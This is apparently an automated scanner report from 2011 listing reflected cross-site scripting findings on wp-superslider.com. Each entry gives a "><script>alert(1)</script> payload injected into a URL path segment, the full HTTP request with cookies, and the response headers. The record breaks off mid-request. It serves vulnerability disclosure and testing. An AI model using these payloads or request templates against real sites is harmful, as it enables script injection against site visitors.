<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e674"><script>alert(1)</script>394812d1f45 was submitted in the REST URL parameter 3. This input was echoed as 6e674\"><script>alert(1)</script>394812d1f45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins6e674"><script>alert(1)</script>394812d1f45/superslider/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:16 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674537+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674537; expires=Thu, 02-Feb-2012 19:22:17 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c560f"><script>alert(1)</script>35a04a94683 was submitted in the REST URL parameter 4. This input was echoed as c560f\"><script>alert(1)</script>35a04a94683 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/supersliderc560f"><script>alert(1)</script>35a04a94683/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31b9"><script>alert(1)</script>7140731d2d5 was submitted in the REST URL parameter 5. This input was echoed as c31b9\"><script>alert(1)</script>7140731d2d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/jsc31b9"><script>alert(1)</script>7140731d2d5/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b3d1"><script>alert(1)</script>c6b5086f849 was submitted in the REST URL parameter 6. This input was echoed as 8b3d1\"><script>alert(1)</script>c6b5086f849 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/js/zoomer.js8b3d1"><script>alert(1)</script>c6b5086f849 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674546; expires=Thu, 02-Feb-2012 19:22:26 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:26 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90df"><script>alert(1)</script>fc5f82eb8e was submitted in the REST URL parameter 1. This input was echoed as d90df\"><script>alert(1)</script>fc5f82eb8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited90df"><script>alert(1)</script>fc5f82eb8e/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d7f2"><script>alert(1)</script>072b6ccaa59 was submitted in the REST URL parameter 2. This input was echoed as 1d7f2\"><script>alert(1)</script>072b6ccaa59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content1d7f2"><script>alert(1)</script>072b6ccaa59/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb38d"><script>alert(1)</script>3a5d2ee8686 was submitted in the REST URL parameter 3. This input was echoed as fb38d\"><script>alert(1)</script>3a5d2ee8686 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsfb38d"><script>alert(1)</script>3a5d2ee8686/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b392f"><script>alert(1)</script>ed6e8acd146 was submitted in the REST URL parameter 4. This input was echoed as b392f\"><script>alert(1)</script>ed6e8acd146 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/supersliderb392f"><script>alert(1)</script>ed6e8acd146/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ed6"><script>alert(1)</script>d2c6d4601bc was submitted in the REST URL parameter 5. This input was echoed as 35ed6\"><script>alert(1)</script>d2c6d4601bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data35ed6"><script>alert(1)</script>d2c6d4601bc/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674549+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674550; expires=Thu, 02-Feb-2012 19:22:30 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55124"><script>alert(1)</script>66807ffcd49 was submitted in the REST URL parameter 6. This input was echoed as 55124\"><script>alert(1)</script>66807ffcd49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider55124"><script>alert(1)</script>66807ffcd49/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674552; expires=Thu, 02-Feb-2012 19:22:32 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7371b"><script>alert(1)</script>e47164d461b was submitted in the REST URL parameter 7. This input was echoed as 7371b\"><script>alert(1)</script>e47164d461b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7371b"><script>alert(1)</script>e47164d461b/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:33 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674553+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b76a"><script>alert(1)</script>669576129ba was submitted in the REST URL parameter 8. This input was echoed as 7b76a\"><script>alert(1)</script>669576129ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7b76a"><script>alert(1)</script>669576129ba/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674555+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2288a"><script>alert(1)</script>db427e6a945 was submitted in the REST URL parameter 9. This input was echoed as 2288a\"><script>alert(1)</script>db427e6a945 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css2288a"><script>alert(1)</script>db427e6a945 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674556+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1daa"><script>alert(1)</script>94f5a7e073c was submitted in the REST URL parameter 1. This input was echoed as d1daa\"><script>alert(1)</script>94f5a7e073c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited1daa"><script>alert(1)</script>94f5a7e073c/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674534+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674534; expires=Thu, 02-Feb-2012 19:22:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c82"><script>alert(1)</script>75b240e8597 was submitted in the REST URL parameter 2. This input was echoed as b7c82\"><script>alert(1)</script>75b240e8597 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb7c82"><script>alert(1)</script>75b240e8597/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
